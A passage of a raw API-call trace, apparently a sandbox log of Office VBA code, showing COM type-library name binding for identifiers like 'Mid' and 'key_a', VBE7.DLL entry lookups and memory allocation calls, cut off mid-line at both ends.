lpWideCharStr="_B_var_msg_len") returned 15 [0160.785] IUnknown:AddRef (This=0x9ab5f00) returned 0xc [0160.785] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_msg_len", lHashVal=0x10de6d, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.785] IUnknown:Release (This=0x9ab5f00) returned 0xb [0160.786] IUnknown:AddRef (This=0x9ab4b50) returned 0x22 [0160.786] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_msg_len", lHashVal=0x10de6d, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.786] IUnknown:Release (This=0x9ab4b50) returned 0x21 [0160.786] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0160.786] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_msg_len", lHashVal=0x10de6d, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.786] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0160.786] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0160.786] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_msg_len", lHashVal=0x10de6d, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.786] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0160.786] IUnknown:AddRef (This=0x9ab5f00) returned 0xc [0160.786] IUnknown:Release (This=0x9ab5f00) returned 0xb [0160.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a07d2, cbMultiByte=15, lpWideCharStr=0x1dc590, cchWideChar=16 | out: lpWideCharStr="_B_var_msg_len") returned 15 [0160.786] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_msg_len", lHashVal=0x10de6d, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6c005f00000000, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x6d005f00720061, ppTypeComp=0x6c005f00000000, pDummy=0x0) returned 0x0 [0160.786] _mbscpy_s (in: _Dst=0x1dc750, _DstSizeInBytes=0x8, _Src=0x63a018a | out: _Dst=0x1dc750) returned 0x0 [0160.786] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b6550) [0160.786] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x2, _Src=0x63a01b2 | out: _Dst=0x1dc9f0) returned 0x0 [0160.786] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.786] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0160.786] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0160.786] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0160.786] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0160.786] IUnknown:Release (This=0xa02b108) returned 0x5 [0160.787] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x573133a, cbMultiByte=4, lpWideCharStr=0x1dc590, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0160.787] ITypeComp:RemoteBind (in: This=0xa02b110, szName="Mid", lHashVal=0x10b3dc, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x573133a, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0160.787] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Mid", lHashVal=0x10b3dc, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x573133a, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0160.787] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="Mid", lHashVal=0x10b3dc, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x573133a, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0160.787] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="Mid", lHashVal=0x10b3dc, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x573133a, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0160.787] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="Mid", lHashVal=0x10b3dc, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.787] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0xa2b6550 [0160.787] _mbscpy_s (in: _Dst=0xa2b6550, _DstSizeInBytes=0x4, _Src=0x573133a | out: _Dst=0xa2b6550) returned 0x0 [0160.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0160.788] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xb, _Src="_B_var_Mid" | out: _Dst="_B_var_Mid") returned 0x0 [0160.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=11, lpWideCharStr=0x1dc530, cchWideChar=11 | out: lpWideCharStr="_B_var_Mid") returned 11 [0160.788] IUnknown:AddRef (This=0x9ab5f00) returned 0xc [0160.788] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_Mid", lHashVal=0x1070ed, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=1, pBstrLibName=0x1dc530) returned 0x0 [0160.788] IUnknown:Release (This=0x9ab5f00) returned 0xb [0160.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Mid", cchWideChar=-1, lpMultiByteStr=0x1dc6e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Mid", lpUsedDefaultChar=0x0) returned 11 [0160.788] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0160.788] IUnknown:AddRef (This=0x9ab5f00) returned 0xc [0160.788] IUnknown:Release (This=0x9ab5f00) returned 0xb [0160.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a0802, cbMultiByte=11, lpWideCharStr=0x1dc590, cchWideChar=12 | out: lpWideCharStr="_B_var_Mid") returned 11 [0160.788] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_Mid", lHashVal=0x1070ed, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0xa121698, pDescKind=0x1dc55c*=1, ppFuncDesc=0x1dc560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.788] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121698, ppTypeAttr=0x1dc550, pDummy=0x1 | out: ppTypeAttr=0x1dc550, pDummy=0x1) returned 0x0 [0160.788] ITypeInfo:LocalReleaseTypeAttr (This=0xa121698) returned 0x0 [0160.788] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc3b0 | out: ppvObject=0x1dc3b0*=0xa121698) returned 0x0 [0160.788] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612742, invkind=1, pFuncIndex=0x1dc3f0 | out: pFuncIndex=0x1dc3f0*=0x6) returned 0x0 [0160.788] ITypeInfo2:GetFuncCustData (in: This=0xa121698, index=0x6, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc408 | out: pVarVal=0x1dc408*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x1070ed)) returned 0x0 [0160.788] IUnknown:Release (This=0xa121698) returned 0x5 [0160.788] IUnknown:AddRef (This=0xa121698) returned 0x6 [0160.788] ITypeInfo:LocalReleaseFuncDesc (This=0xa121698) returned 0x0 [0160.788] IUnknown:Release (This=0xa121698) returned 0x5 [0160.788] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc608 | out: ppvObject=0x1dc608*=0x0) returned 0x80004002 [0160.788] IUnknown:AddRef (This=0xa121698) returned 0x6 [0160.788] IUnknown:Release (This=0xa121698) returned 0x5 [0160.789] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0160.789] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0160.789] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b6550) [0160.789] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.789] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0160.789] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.789] IUnknown:Release (This=0x9ab5f00) returned 0xc [0160.789] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.789] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0160.789] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0160.789] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0160.789] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.789] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.789] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.789] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0160.789] GetCurrentProcess () returned 0xffffffffffffffff [0160.789] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x53) returned 1 [0160.789] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0160.789] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0160.790] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0160.790] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0160.790] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0160.790] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0160.790] IUnknown:Release (This=0xa02b108) returned 0x5 [0160.790] IUnknown:Release (This=0xa02b108) returned 0x4 [0160.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a01d6, cbMultiByte=6, lpWideCharStr=0x1dc590, cchWideChar=7 | out: lpWideCharStr="key_a") returned 6 [0160.790] ITypeComp:RemoteBind (in: This=0xa02b110, szName="key_a", lHashVal=0x104f15, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a01d6, cbMultiByte=6, lpWideCharStr=0x1dc5d0, cchWideChar=7 | out: lpWideCharStr="key_a") returned 6 [0160.790] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="key_a", lHashVal=0x104f15, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a01d6, cbMultiByte=6, lpWideCharStr=0x1dc5d0, cchWideChar=7 | out: lpWideCharStr="key_a") returned 6 [0160.790] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="key_a", lHashVal=0x104f15, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a01d6, cbMultiByte=6, lpWideCharStr=0x1dc5d0, cchWideChar=7 | out: lpWideCharStr="key_a") returned 6 [0160.790] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="key_a", lHashVal=0x104f15, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a01d6, cbMultiByte=6, lpWideCharStr=0x1dc5d0, cchWideChar=7 | out: lpWideCharStr="key_a") returned 6 [0160.790] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="key_a", lHashVal=0x104f15, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0160.790] IMalloc:Alloc (This=0x7fefecb5380, cb=0xd) returned 0xa2b6550 [0160.790] _mbscpy_s (in: _Dst=0xa2b6550, _DstSizeInBytes=0x6, _Src=0x63a01d6 | out: _Dst=0xa2b6550) returned 0x0 [0160.790] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_key_a") returned 0x101302 [0160.790] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xd, _Src="_B_var_key_a" | out: _Dst="_B_var_key_a") returned 0x0 [0160.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=13, lpWideCharStr=0x1dc530, cchWideChar=13 | out: lpWideCharStr="_B_var_key_a") returned 13 [0160.791] IUnknown:AddRef (This=0x9ab5f00) returned 0xd [0160.791] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_key_a", lHashVal=0x101302, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.791] IUnknown:Release (This=0x9ab5f00) returned 0xc [0160.791] IUnknown:AddRef (This=0x9ab4b50) returned 0x22 [0160.791] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_key_a", lHashVal=0x101302, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.791] IUnknown:Release (This=0x9ab4b50) returned 0x21 [0160.791] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0160.791] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_key_a", lHashVal=0x101302, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.791] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0160.791] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0160.791] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_key_a", lHashVal=0x101302, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0160.791] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0160.791] IUnknown:AddRef (This=0x9ab5f00) returned 0xd [0160.791] IUnknown:Release (This=0x9ab5f00) returned 0xc [0160.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a082e, cbMultiByte=13, lpWideCharStr=0x1dc590, cchWideChar=14 | out: lpWideCharStr="_B_var_key_a") returned 13 [0160.791] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_key_a", lHashVal=0x101302, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x6b005f00720061, ppTypeComp=0x61005f00000000, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x6b005f00720061, ppTypeComp=0x61005f00000000, pDummy=0x0) returned 0x0 [0160.791] _mbscpy_s (in: _Dst=0x1dc750, _DstSizeInBytes=0x6, _Src=0x63a01d6 | out: _Dst=0x1dc750) returned 0x0 [0160.791] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b6550) [0160.791] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0xa2b6550 [0160.791] _mbscpy_s (in: _Dst=0xa2b6550, _DstSizeInBytes=0x4, _Src=0x573133a | out: _Dst=0xa2b6550) returned 0x0 [0160.792] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0160.792] IUnknown:AddRef (This=0x9ab5f00) returned 0xd [0160.792] IUnknown:Release (This=0x9ab5f00) returned 0xc [0160.792] IUnknown:AddRef (This=0xa121698) returned 0x6 [0160.792] IUnknown:Release (This=0xa121698) returned 0x5 [0160.792] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0160.792] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0160.792] IMalloc:Free (This=0x7fefecb5380, pv=0xa2b6550) [0160.792] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.792] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0160.792] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.792] IUnknown:Release (This=0x9ab5f00) returned 0xc [0160.792] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.792] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0160.792] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0160.792] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x3, _Src=0x63a01fe | out: _Dst=0x1dc9f0) returned 0x0 [0160.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f46c, cbMultiByte=2, lpWideCharStr=0x6703de4, cchWideChar=6 | out: lpWideCharStr="&H") returned 2 [0160.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f47c, cbMultiByte=2, lpWideCharStr=0x67801b4, cchWideChar=6 | out: lpWideCharStr="0x") returned 2 [0160.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f482, cbMultiByte=0, lpWideCharStr=0x678021e, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0160.793] IUnknown:AddRef (This=0xa121698) returned 0x6 [0160.793] IUnknown:Release (This=0xa121698) returned 0x5 [0160.793] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0160.793] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0160.793] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0160.793] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0160.793] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0160.793] IUnknown:Release (This=0x9ab5f00) returned 0xc [0160.794] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0160.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0160.794] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0160.794] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612785, invkind=1, refPtrFlags=0x0, 